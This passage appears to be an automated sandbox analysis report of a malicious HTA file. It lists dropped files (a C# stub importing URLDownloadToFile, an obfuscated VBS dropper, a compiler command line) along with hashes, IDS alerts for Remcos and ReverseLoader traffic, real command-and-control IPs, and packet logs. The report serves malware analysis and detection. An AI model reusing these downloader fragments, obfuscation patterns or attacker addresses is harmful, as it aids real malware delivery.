SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jcvnt1wo.le4.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kjzaxl5k.l2g.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s1bwzvu3.0nj.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uakkkfag.x5x.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zre34ky5.1to.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\gxlowwdn\CSC56436D359159402F8D448B12D32335C6.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.091394235349783
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grybYak7YnqqGNPN5Dlq5J:+RI+ycuZhNiakS6PNnqX
MD5:	B1FC0CB499C8E0225CC1BB56D48B9A0B
SHA1:	AE48B7D030E748303E50E537E8D23BDD91B9EA7D
SHA-256:	5B715C82216DDCD51FB7FBCCD9B38EE07809EB76F0C41D8C0A4495D23961B82D
SHA-512:	1668CDE44D912EA3836C10E8E97E6511C721A63D3E266EE7FFCBD159AC0C3D3ABCA1B9EE40D19BD35E3B6FE380B5C814989DE50764F034DFABB68981DE6D7465
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...g.x.l.o.w.w.d.n...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...g.x.l.o.w.w.d.n...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\gxlowwdn\gxlowwdn.0.cs

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (369)
Category:	dropped
Size (bytes):	477
Entropy (8bit):	3.737854877726566
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuTqmMCDQXReKJ8SRHy4HewziGKmyb5Jvc1IiP/Qy:V/DTLDfu3kXfH68iGKv3EfP/Qy
MD5:	2E19302EE1FACA85EA0132E02DA90F67
SHA1:	4930A2AF181CE2FB012629F3EF214CB1B591F6FF
SHA-256:	E7EB33287B9B8BE9EE6F0E247842A9A65567E1B6A63030951A79A05B6A38F46B
SHA-512:	CB97722EB63AB457DF075A33FD61BA6C4CC516BDE8DAFB2E44BC762230242D0033A965CADBA64D0C06A8447512E4E56043C78CDA352BD597F395E0AB6B6E16E3
Malicious:	false
Preview:	.using System;.using System.Runtime.InteropServices;..namespace b.{. public class zvj. {. [DllImport("uRLmOn", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr KyQAmVJIQoG,string bj,string Qm,uint IrGdpHvSMl,IntPtr FLNzUnfLG);.. }..}.

C:\Users\user\AppData\Local\Temp\gxlowwdn\gxlowwdn.cmdline

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (372), with no line terminators
Category:	dropped
Size (bytes):	375
Entropy (8bit):	5.207636515080916
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723fUzxs7+AEszIN723fT9:p37Lvkmb6K2asWZETaJ
MD5:	722F672218A7753D4D86B762856DAF0C
SHA1:	89716A767DEA9E6FF2FB56F69A8AF7BCFEACFD90
SHA-256:	C4D72F4722E8007D31B21B5306C12E085998A786303EE14FE205278FBAB0F81D
SHA-512:	9E6645FCB1C73239FA9AADBD4F3B8B5974EC0DCD501953016E236A513ACB2E7D1EFC5447FF232E1F51818B1E1A035B7F8B0DA86B079515781C3AFCEF67315B22
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\gxlowwdn\gxlowwdn.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\gxlowwdn\gxlowwdn.0.cs"

C:\Users\user\AppData\Local\Temp\gxlowwdn\gxlowwdn.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3072
Entropy (8bit):	2.8127885892258946
Encrypted:	false
SSDEEP:	24:etGS0WPBu5exl8alzkibr8izMtkZfsDNTjcUWI+ycuZhNiakS6PNnq:60sx+alNbrzzzJsDNTA31ulia32q
MD5:	7FAD21224353E7DD740AFF5C39037AE4
SHA1:	1F5748E0AFB248F8C1FEE268EB234BA9E873FF50
SHA-256:	DEBF6E68141551D2BC42FC5060476DA370C07D16DACBAD8F12F7B7F9313741C9
SHA-512:	CB0880083E22200B44B209FF8156DEA7503542BB6F0ECC17FD58CC2C3015C5DBF16D49C4CD8EFC610116CB22F224E9E18FD3CA7108C9AFE7B40C154E54955B28
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...V.Yg...........!.................#... ...@....... ....................................@.................................T#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................-.&.....s.....s.......................................... 4.....P ......F.........L.....X.....[.....^.....i...F.....F...!.F.....F.......!............4..................................................<Module>.gx

C:\Users\user\AppData\Local\Temp\gxlowwdn\gxlowwdn.out

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (455), with CRLF, CR line terminators
Category:	modified
Size (bytes):	876
Entropy (8bit):	5.286598688026741
Encrypted:	false
SSDEEP:	24:KOuqd3ka6K2adETaMKax5DqBVKVrdFAMBJTH:yika6CdE+MK2DcVKdBJj
MD5:	E2CE02BD4F7B47B4B613F4FFD16B10AF
SHA1:	DB5BA1266A3E2B0A0F26FA423313BB0BE9B3841D
SHA-256:	43B84C8A35F5AA0478883E500596D5391101F77FF0BFEC10A68B3E47F213A915
SHA-512:	8C545209F4764299B271B74D4FED5261B3612DE6A6D6033A610F891FB353E0F16707F5A0EEB79F6C631E6C03DB3682E629C25931B2FEA1516C16377F88F8F7DB
Malicious:	false
Preview:	.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\gxlowwdn\gxlowwdn.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\gxlowwdn\gxlowwdn.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Roaming\sheismygirlwholovedmealotstillalsoshelovesmetruly.vbs

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-16, little-endian text, with very long lines (3203), with CRLF line terminators
Category:	dropped
Size (bytes):	153952
Entropy (8bit):	3.8067197460998417
Encrypted:	false
SSDEEP:	3072:HJlofF4RJFAiJlofF4RJFNiJlofF4RJFl:HJlofeRJFAiJlofeRJFNiJlofeRJFl
MD5:	5CE00A79A9F41D260446BFDCC6267ADF
SHA1:	0B2B90BEB56C59916B98004B1444698538729822
SHA-256:	EFAB5D21ED82F610BC5F1734B909A7E5C3A6C2ECEBB276DD03B4D5BAF8E9B058
SHA-512:	D4DE7FE61F23CE7524ED3123319AC93F33AE1806BD426045CA9DF1FA9EE82CCA58AA314711BBDE6A6FFA2EEE98DC20CC5E4D80D2EC7ABB028BE0639944714FEE
Malicious:	true
Preview:	...... . . . .....P.t.u.O.q.o.f.e.c.d.G.k.H.L.t. .=. .".c.I.k.R.N.r.W.W.z.n.d.u.x.p.B.".....n.G.T.z.L.p.K.i.c.q.p.t.i.a.k. .=. .".G.U.K.e.W.L.p.u.e.j.c.q.l.e.K.".....e.L.e.j.L.A.W.U.k.G.B.G.W.b.L. .=. .".W.c.T.W.L.l.b.i.K.W.i.m.J.m.O.".........K.N.k.U.n.z.W.o.u.h.Q.K.C.o.W. .=. .".O.z.o.G.A.k.p.a.R.g.h.P.i.d.l.".....l.k.R.h.m.T.i.u.i.x.B.L.f.x.b. .=. .".P.L.n.G.e.k.q.a.I.n.W.f.i.L.a.".....N.c.t.U.W.s.C.b.B.L.l.m.L.J.H. .=. .".t.i.G.W.W.n.m.U.o.L.k.L.K.e.Q.".....W.i.I.K.l.n.i.K.l.j.p.A.k.G.Z. .=. .".G.i.N.k.o.B.U.x.L.c.s.W.b.L.Z.".....c.W.e.q.B.L.o.o.z.j.K.t.o.L.Q. .=. .".n.i.p.Z.i.W.j.K.L.z.m.G.W.A.v.".....W.B.o.q.i.Q.l.i.W.C.W.l.h.i.k. .=. .".O.A.G.W.K.m.Z.S.L.c.x.U.r.W.d.".....b.A.L.U.L.q.G.x.L.W.f.u.z.m.k. .=. .".l.b.m.c.W.G.A.O.Z.A.m.i.p.c.K.".....e.p.L.l.x.r.K.N.K.s.k.h.A.U.U. .=. .".L.c.K.i.K.i.i.z.J.N.a.o.C.b.S.".....l.k.L.h.a.P.O.n.K.h.u.j.f.k.h. .=. .".L.h.P.C.T.e.L.Z.m.n.k.G.u.Z.n.".....J.G.i.L.c.C.f.G.K.N.C.t.t.e.k. .=. .".W.i.i.W.z.W.b.k.B.P.b.o.G.a.c.".....P.m.L.W.f.S.k.S.

Static File Info

General

File type:	HTML document, ASCII text, with very long lines (65450), with CRLF line terminators
Entropy (8bit):	2.630659146917442
TrID:
File name:	nicegirlforyou.hta
File size:	83'209 bytes
MD5:	fea592b533e97736debe379b886595a7
SHA1:	70eb330d0db30762edc64d262b7f1cfc24c8b540
SHA256:	fbda5655a80445279f376d372348b57ab9dbadae81e69df823a6949a412cbe96
SHA512:	da2ca1896e0d1d9f2e30e73ba1842e058fce5bfe43e4ebc8b8c3759d018abb73a330d975a6a857ea16c18bf48d73d02d2442eb8970823f42e480572773511637
SSDEEP:	768:t5bUZA+cT/RVeU2Dx6AyZ6LAuAHAmxLkFyYEOKuryyUSFG/w6acCEOKury/lI5Tq:t5
TLSH:	B7836907D54BF93CEB87A9FBE33C9B1A1386AD11ED8E450F06AC05551BD5ACBB02C894
File Content Preview:	<Script Language='Javascript'>.. HTML Encryption provided by kufat.com -->.. ..document.write(unescape('%3C%53%63%72%69%70%74%20%4C%61%6E%67%75%61%67%65%3D%27%4A%61%76%61%73%63%72%69%70%74%27%3E%0A%3C%21%2D%2D%20%48%54%4D%4C%20%45%6E%63%72%79%70%74

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-11T11:22:54.286610+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	50016	192.169.69.26	14645	TCP
2024-12-11T11:23:02.599903+0100	2858795	ETPRO MALWARE ReverseLoader Payload Request (GET) M2	1	192.168.2.6	49707	172.245.142.60	80	TCP
2024-12-11T11:23:13.327409+0100	2049038	ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2	1	151.101.1.137	443	192.168.2.6	49710	TCP
2024-12-11T11:23:29.784941+0100	2841075	ETPRO MALWARE Terse Request to paste .ee - Possible Download	1	192.168.2.6	49759	104.21.84.67	443	TCP
2024-12-11T11:23:30.189989+0100	2020424	ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1	1	104.21.84.67	443	192.168.2.6	49759	TCP
2024-12-11T11:23:30.189989+0100	2020425	ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2	1	104.21.84.67	443	192.168.2.6	49759	TCP
2024-12-11T11:23:31.159684+0100	2858295	ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)	1	104.21.84.67	443	192.168.2.6	49759	TCP
2024-12-11T11:23:42.070450+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	49765	192.169.69.26	14645	TCP
2024-12-11T11:23:53.595653+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	49793	192.169.69.26	14645	TCP
2024-12-11T11:24:05.016800+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	49823	192.169.69.26	14645	TCP
2024-12-11T11:24:16.489153+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	49851	192.169.69.26	14645	TCP
2024-12-11T11:24:27.937721+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	49879	192.169.69.26	14645	TCP
2024-12-11T11:24:39.404581+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	49907	192.169.69.26	14645	TCP
2024-12-11T11:24:51.203478+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	49938	192.169.69.26	14645	TCP
2024-12-11T11:25:02.711340+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	49965	192.169.69.26	14645	TCP
2024-12-11T11:25:14.227525+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	49992	192.169.69.26	14645	TCP
2024-12-11T11:25:25.659401+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	50003	192.169.69.26	14645	TCP
2024-12-11T11:25:37.107534+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	50004	192.169.69.26	14645	TCP
2024-12-11T11:25:48.643825+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	50006	192.169.69.26	14645	TCP
2024-12-11T11:26:00.424029+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	50008	192.169.69.26	14645	TCP
2024-12-11T11:26:11.961120+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	50009	192.169.69.26	14645	TCP
2024-12-11T11:26:23.541405+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	50010	192.169.69.26	14645	TCP
2024-12-11T11:26:35.057421+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	50012	192.169.69.26	14645	TCP
2024-12-11T11:26:46.560481+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	50013	192.169.69.26	14645	TCP
2024-12-11T11:26:57.999070+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.6	50015	192.169.69.26	14645	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 11, 2024 11:23:01.327030897 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:01.447257996 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:01.449284077 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:01.459352016 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:01.578768015 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:02.599783897 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:02.599812031 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:02.599828959 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:02.599903107 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:02.599941969 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:02.599963903 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:02.599980116 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:02.599987030 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:02.599998951 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:02.600023985 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:02.600065947 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:02.600203991 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:02.600267887 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:02.600298882 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:02.600315094 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:02.600343943 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:02.600363970 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:02.719865084 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:02.719966888 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:02.720334053 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:02.720391989 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:02.723768950 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:02.723828077 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:02.723858118 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:02.723918915 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:02.792239904 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:02.792257071 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:02.792344093 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:02.795934916 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:02.796123981 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:02.796219110 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:02.804344893 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:02.805253029 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:02.807384014 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:02.807461023 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:02.807502985 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:02.807571888 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:02.815996885 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:02.816148043 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:02.816235065 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:02.816298008 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:02.824281931 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:02.824322939 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:02.824348927 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:02.824378014 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:02.832580090 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:02.832722902 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:02.832801104 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:02.840962887 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:02.841088057 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:02.841156960 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:02.849441051 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:02.849524021 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:02.849572897 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:02.858464956 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:02.858478069 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:02.858529091 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:02.865988970 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:02.866303921 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:02.866383076 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:02.873862028 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:02.873873949 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:02.873934031 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:02.881345034 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:02.881413937 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:02.983901024 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:02.983980894 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:02.984011889 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:02.984180927 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:02.986113071 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:02.986177921 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:02.986236095 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:02.986398935 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:02.990686893 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:02.990757942 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:02.990802050 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:02.990838051 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:02.995251894 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:02.995398045 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:02.995402098 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:02.995465994 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:02.999783039 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:02.999835014 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:02.999871969 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:02.999926090 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.004434109 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.004496098 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.004501104 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.004544020 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.008848906 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.008922100 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.008950949 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.009073019 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.013430119 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.013490915 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.013549089 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.013600111 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.017966032 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.018076897 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.018148899 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.022520065 CET	80	49707	172.245.142.60	192.168.2.6
Dec 11, 2024 11:23:03.022583961 CET	49707	80	192.168.2.6	172.245.142.60
Dec 11, 2024 11:23:03.022612095 CET	80	49707	172.245.142.60	192.168.2.6
